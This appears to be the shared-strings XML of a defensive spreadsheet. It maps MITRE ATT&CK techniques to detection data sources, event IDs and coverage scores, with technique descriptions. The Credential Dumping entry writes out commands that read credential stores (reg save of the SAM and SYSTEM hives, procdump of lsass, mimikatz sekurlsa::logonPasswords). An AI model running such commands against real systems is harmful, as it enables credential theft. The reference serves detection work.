    <t>T1090</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>T1093</t>
  </si>
  <si>
    <t>T1094</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>T1096</t>
  </si>
  <si>
    <t>T1097</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>T1099</t>
  </si>
  <si>
    <t>T1100</t>
  </si>
  <si>
    <t>T1101</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>T1103</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>T1107</t>
  </si>
  <si>
    <t>T1108</t>
  </si>
  <si>
    <t>T1109</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>T1116</t>
  </si>
  <si>
    <t>T1117</t>
  </si>
  <si>
    <t>T1118</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>T1121</t>
  </si>
  <si>
    <t>T1122</t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t xml:space="preserve">T1125 </t>
  </si>
  <si>
    <t>T1126</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>T1128</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <t>T1130</t>
  </si>
  <si>
    <t>T1131</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>T1138</t>
  </si>
  <si>
    <t>T1139</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>T1141</t>
  </si>
  <si>
    <t>T1142</t>
  </si>
  <si>
    <t>T1143</t>
  </si>
  <si>
    <t>T1144</t>
  </si>
  <si>
    <t>T1145</t>
  </si>
  <si>
    <t>T1146</t>
  </si>
  <si>
    <t>T1147</t>
  </si>
  <si>
    <t>T1148</t>
  </si>
  <si>
    <t>T1149</t>
  </si>
  <si>
    <t>T1150</t>
  </si>
  <si>
    <t>T1151</t>
  </si>
  <si>
    <t>T1152</t>
  </si>
  <si>
    <t>T1153</t>
  </si>
  <si>
    <t>T1154</t>
  </si>
  <si>
    <t>T1155</t>
  </si>
  <si>
    <t>T1156</t>
  </si>
  <si>
    <t>T1157</t>
  </si>
  <si>
    <t>T1158</t>
  </si>
  <si>
    <t>T1159</t>
  </si>
  <si>
    <t>T1160</t>
  </si>
  <si>
    <t>T1161</t>
  </si>
  <si>
    <t>T1162</t>
  </si>
  <si>
    <t>T1163</t>
  </si>
  <si>
    <t>T1164</t>
  </si>
  <si>
    <t>T1165</t>
  </si>
  <si>
    <t>T1166</t>
  </si>
  <si>
    <t>T1167</t>
  </si>
  <si>
    <t>T1168</t>
  </si>
  <si>
    <t>T1169</t>
  </si>
  <si>
    <t>T1170</t>
  </si>
  <si>
    <t>T1171</t>
  </si>
  <si>
    <t>T1172</t>
  </si>
  <si>
    <t>T1173</t>
  </si>
  <si>
    <t>T1174</t>
  </si>
  <si>
    <t>T1175</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>T1177</t>
  </si>
  <si>
    <t>T1178</t>
  </si>
  <si>
    <t>T1179</t>
  </si>
  <si>
    <t>T1180</t>
  </si>
  <si>
    <t>T1181</t>
  </si>
  <si>
    <t>T1182</t>
  </si>
  <si>
    <t>T1183</t>
  </si>
  <si>
    <t>T1184</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>T1186</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>T1188</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>T1191</t>
  </si>
  <si>
    <t>T1192</t>
  </si>
  <si>
    <t>T1193</t>
  </si>
  <si>
    <t>T1194</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>T1196</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>T1198</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>T1206</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>T1208</t>
  </si>
  <si>
    <t>T1209</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>T1212</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>T1214</t>
  </si>
  <si>
    <t>T1215</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>T1220</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>T1222</t>
  </si>
  <si>
    <t>T1223</t>
  </si>
  <si>
    <t>Completeness</t>
  </si>
  <si>
    <t>number, min 0 max 5</t>
  </si>
  <si>
    <t>Timeliness</t>
  </si>
  <si>
    <t>Availability</t>
  </si>
  <si>
    <t>DataSource</t>
  </si>
  <si>
    <t>Score</t>
  </si>
  <si>
    <t>Anti-virus</t>
  </si>
  <si>
    <t>TrendMicro</t>
  </si>
  <si>
    <t>Symantec</t>
  </si>
  <si>
    <t>Kaspersky</t>
  </si>
  <si>
    <t>Windows Defender:1116,1117</t>
  </si>
  <si>
    <t>API monitoring</t>
  </si>
  <si>
    <t>Authentication logs</t>
  </si>
  <si>
    <t>Windows:4624</t>
  </si>
  <si>
    <t>Windows:4625</t>
  </si>
  <si>
    <t>Windows:4769</t>
  </si>
  <si>
    <t>Binary file metadata</t>
  </si>
  <si>
    <t>BIOS</t>
  </si>
  <si>
    <t>Data loss prevention</t>
  </si>
  <si>
    <t>Windows:4657</t>
  </si>
  <si>
    <t>Digital Certificate Logs</t>
  </si>
  <si>
    <t>DLL monitoring</t>
  </si>
  <si>
    <t>Sysmon:7</t>
  </si>
  <si>
    <t>EFI</t>
  </si>
  <si>
    <t>Environment variable</t>
  </si>
  <si>
    <t>Email gateway</t>
  </si>
  <si>
    <t>File monitoring</t>
  </si>
  <si>
    <t>Windows:4663</t>
  </si>
  <si>
    <t>Sysmon:2</t>
  </si>
  <si>
    <t>Sysmon:11</t>
  </si>
  <si>
    <t>Sysmon:15</t>
  </si>
  <si>
    <t>Windows:5140,5145</t>
  </si>
  <si>
    <t>Host network interface</t>
  </si>
  <si>
    <t>Kernel drivers</t>
  </si>
  <si>
    <t>Sysmon:6</t>
  </si>
  <si>
    <t>Windows:5038,6281</t>
  </si>
  <si>
    <t>Loaded DLLs</t>
  </si>
  <si>
    <t>Malware reverse engineering</t>
  </si>
  <si>
    <t>Cuckoo sandbox</t>
  </si>
  <si>
    <t>PaloAlto:WildFire</t>
  </si>
  <si>
    <t>MBR</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Network device logs</t>
  </si>
  <si>
    <t>PaloAlto:DeviceLog</t>
  </si>
  <si>
    <t>Network protocol analysis</t>
  </si>
  <si>
    <t>Bro logging</t>
  </si>
  <si>
    <t>PaloAlto:TrafficLog</t>
  </si>
  <si>
    <t>Packet capture</t>
  </si>
  <si>
    <t>Moloch</t>
  </si>
  <si>
    <t>PowerShell logs</t>
  </si>
  <si>
    <t>PowerShell:200-500</t>
  </si>
  <si>
    <t>PowerShell:4100-4104</t>
  </si>
  <si>
    <t>Process command-line parameters</t>
  </si>
  <si>
    <t>Windows:4688</t>
  </si>
  <si>
    <t>Sysmon:1</t>
  </si>
  <si>
    <t>Process monitoring</t>
  </si>
  <si>
    <t>Windows:4689</t>
  </si>
  <si>
    <t>Sysmon:5</t>
  </si>
  <si>
    <t>Sysmon:8</t>
  </si>
  <si>
    <t>Windows Scheduled Tasks:100-200</t>
  </si>
  <si>
    <t>Windows Whitelist:8000-8027</t>
  </si>
  <si>
    <t>Process use of network</t>
  </si>
  <si>
    <t>Windows:5156</t>
  </si>
  <si>
    <t>Sysmon:3</t>
  </si>
  <si>
    <t>Sysmon:17</t>
  </si>
  <si>
    <t>Sysmon:18</t>
  </si>
  <si>
    <t>Sensor health and status</t>
  </si>
  <si>
    <t>Sysmon:4</t>
  </si>
  <si>
    <t>Sysmon:16</t>
  </si>
  <si>
    <t>Windows:6005</t>
  </si>
  <si>
    <t>Windows Defender:1005,1006,1008,1010,2001,2003,2004,3002,5008</t>
  </si>
  <si>
    <t>Services</t>
  </si>
  <si>
    <t>Windows Firewall:2003</t>
  </si>
  <si>
    <t>Windows:7040</t>
  </si>
  <si>
    <t>Windows:7045</t>
  </si>
  <si>
    <t>SSL/TLS inspection</t>
  </si>
  <si>
    <t>System calls</t>
  </si>
  <si>
    <t>Third-party application logs</t>
  </si>
  <si>
    <t>User interface</t>
  </si>
  <si>
    <t>VBR</t>
  </si>
  <si>
    <t>Windows Error Reporting</t>
  </si>
  <si>
    <t>Windows:1000,1001</t>
  </si>
  <si>
    <t>Windows event logs</t>
  </si>
  <si>
    <t>Windows:4724, 4738,4728,4732</t>
  </si>
  <si>
    <t>Windows:1102</t>
  </si>
  <si>
    <t>Windows Registry</t>
  </si>
  <si>
    <t>Sysmon:12</t>
  </si>
  <si>
    <t>Sysmon:13</t>
  </si>
  <si>
    <t>Sysmon:14</t>
  </si>
  <si>
    <t>WMI Objects</t>
  </si>
  <si>
    <t>Windows WMI:5861</t>
  </si>
  <si>
    <t>Sysmon:19</t>
  </si>
  <si>
    <t>Sysmon:20</t>
  </si>
  <si>
    <t>Sysmon:21</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Platforms</t>
  </si>
  <si>
    <t>Detection</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Tactic</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Process monitoring,Network protocol analysis</t>
  </si>
  <si>
    <t>Linux,macOS,Windows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</si>
  <si>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</si>
  <si>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</si>
  <si>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command-and-control</t>
  </si>
  <si>
    <t>Data Compressed</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Linux,Windows,macOS</t>
  </si>
  <si>
    <t>Compression software and compressed files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known compression utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used.
If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)</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</si>
  <si>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</si>
  <si>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exfiltration</t>
  </si>
  <si>
    <t>Credential Dumping</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows,Linux,macOS</t>
  </si>
  <si>
    <t>### Windows
Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process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[Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1086) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols  (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
### Linux
To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/&lt;pid&gt;/maps&lt;/code&gt;, where the &lt;code&gt;&lt;pid&gt;&lt;/code&gt;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</si>
  <si>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Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
### Windows
#### SAM (Security Accounts Manager)
The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe 
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075):
* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;
* &lt;code&gt;reg save HKLM\system system&lt;/code&gt;
Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)
Notes:
Rid 500 account is the local, in-built administrator.
Rid 501 is the guest account.
User accounts start with a RID of 1,000+.
#### Cached Credentials
The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.
A number of tools can be used to retrieve the SAM file through in-memory techniques.
* pwdumpx.exe 
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
Notes:
Cached credentials for Windows Vista are derived using PBKDF2.
#### Local Security Authority (LSA) Secrets
With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.
When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.
A number of tools can be used to retrieve the SAM file through in-memory techniques.
* pwdumpx.exe 
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
Notes:
The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.
Windows 10 adds protections for LSA Secrets described in Mitigation.
#### NTDS from Domain Controller
Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
#### Group Policy Preference (GPP) Files
Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.
These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)
The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
* Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp"
* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
Notes:
On the SYSVOL share, the following can be used to enumerate potential XML files.
dir /s * .xml
#### Service Principal Names (SPNs)
See [Kerberoasting](https://attack.mitre.org/techniques/T1208).
#### Plaintext Credentials
After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.
SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.
The following SSPs can be used to access credentials:
Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)
Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)
The following tools can be used to enumerate credentials:
* [Windows Credential Editor](https://attack.mitre.org/software/S0005)
* [Mimikatz](https://attack.mitre.org/software/S0002)
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* &lt;code&gt;procdump -ma lsass.exe lsass_dump&lt;/code&gt;
Locally, mimikatz can be run:
* &lt;code&gt;sekurlsa::Minidump lsassdump.dmp&lt;/code&gt;
* &lt;code&gt;sekurlsa::logonPasswords&lt;/code&gt;
#### DCSync
DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's  application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)
### Linux
#### Proc filesystem
The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</t>
  </si>
  <si>
    <t>credential-access</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns)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t>
  </si>
  <si>
    <t>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 (Citation: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t>
  </si>
  <si>
    <t>persistence</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system.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</si>
  <si>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[Command-Line Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.</t>
  </si>
  <si>
    <t>collection</t>
  </si>
  <si>
    <t>File System Logical Offsets</t>
  </si>
  <si>
    <t>Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)
Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1086), additional logging of PowerShell scripts is recommended.</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</si>
  <si>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 (Citation: Hakobyan 2009)
Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)</t>
  </si>
  <si>
    <t>defense-evasion</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well.</t>
  </si>
  <si>
    <t>discovery</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Malware reverse engineering</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>macOS,Windows</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</si>
  <si>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</si>
  <si>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attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
In Mac, this can be done natively with a small [AppleScript](https://attack.mitre.org/techniques/T1155) script.</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>User interface,Process monitoring</t>
  </si>
  <si>
    <t>Processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a mouse click or key press) but access the network without such may be malicious.
Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>Windows Registry,Process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</si>
  <si>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Interaction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075)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</si>
  <si>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interact with the Windows Registry to gather information about the system, configuration, and installed software.
The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.</t>
  </si>
  <si>
    <t>Port Monitors</t>
  </si>
  <si>
    <t>File monitoring,API monitoring,DLL monitoring,Windows Registry,Process monitoring</t>
  </si>
  <si>
    <t>* Monitor process API calls to  (Citation: AddMonitor).
* Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal.
* New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.
* Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;.
* Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>A port monitor can be set through the  (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.</t>
  </si>
  <si>
    <t>persistence,privilege-escalation</t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t>BIOS,MBR,System calls</t>
  </si>
  <si>
    <t>Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)</t>
  </si>
  <si>
    <t>Rootkits are programs that hide the existence of malware by intercepting (i.e., [Hooking](https://attack.mitre.org/techniques/T1179)) and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a [Hypervisor](https://attack.mitre.org/techniques/T1062), Master Boot Record, or the [System Firmware](https://attack.mitre.org/techniques/T1019). (Citation: Wikipedia Rootkit)
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</t>
  </si>
  <si>
    <t>Accessibility Features</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</si>
  <si>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&lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt;.</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</si>
  <si>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because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in &lt;code&gt;%systemdir%\&lt;/code&gt;, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods: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Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example,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 (Citation: Tilbury 2014)
Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)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t>
  </si>
  <si>
    <t>System Network Configuration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</si>
  <si>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</si>
  <si>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will likely look for details about the network configuration and settings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t>
  </si>
  <si>
    <t>Application Deployment Software</t>
  </si>
  <si>
    <t>File monitoring,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>Monitor application deployments from a secondary system. Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</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</si>
  <si>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</si>
  <si>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lateral-movement</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>Network protocol analysis,Process monitoring,Process use of network,Process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</si>
  <si>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</si>
  <si>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 Windows
Examples of tools and commands that acquire this information include "ping" or "net view" using [Net](https://attack.mitre.org/software/S0039).
### Mac
Specific to Mac, the &lt;code&gt;bonjour&lt;/code&gt; protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems.
### Linux
Utilities such as "ping" and others can be used to gather information about remote systems.</t>
  </si>
  <si>
    <t>System Firmware</t>
  </si>
  <si>
    <t>API monitoring,BIOS,EFI</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: 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 (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)</t>
  </si>
  <si>
    <t>The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: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</si>
  <si>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Automated Exfiltration</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</t>
  </si>
  <si>
    <t>Data, such as sensitive documents, may be exfiltrated through the use of automated processing or [Scripting](https://attack.mitre.org/techniques/T1064) after being gathered during Collection. 
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t>Remote Services</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</si>
  <si>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t>
  </si>
  <si>
    <t>An adversary may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.</t>
  </si>
  <si>
    <t>Data Encrypted</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</t>
  </si>
  <si>
    <t>Encryption software and encrypted files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known encryption utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used. Often the encryption key is stated within command-line invocation of the software. 
A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures. 
Network traffic may also be analyzed for entropy to determine if encrypted data is being transmitted. (Citation: Zhang 2013) If the communications channel is unencrypted, encrypted files of known file types can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)</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</si>
  <si>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[Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)</t>
  </si>
  <si>
    <t>Shortcut Modification</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</si>
  <si>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</si>
